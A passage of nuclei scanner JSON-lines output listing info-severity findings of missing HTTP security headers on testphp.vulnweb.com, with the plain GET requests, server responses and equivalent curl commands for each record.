'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:34.311233437Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:34.311280111Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:34.913007938Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.512984643Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:35.519771873Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:35.519823409Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.515445171Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.516926151Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.517353096Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.51763676Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:33.519404192Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 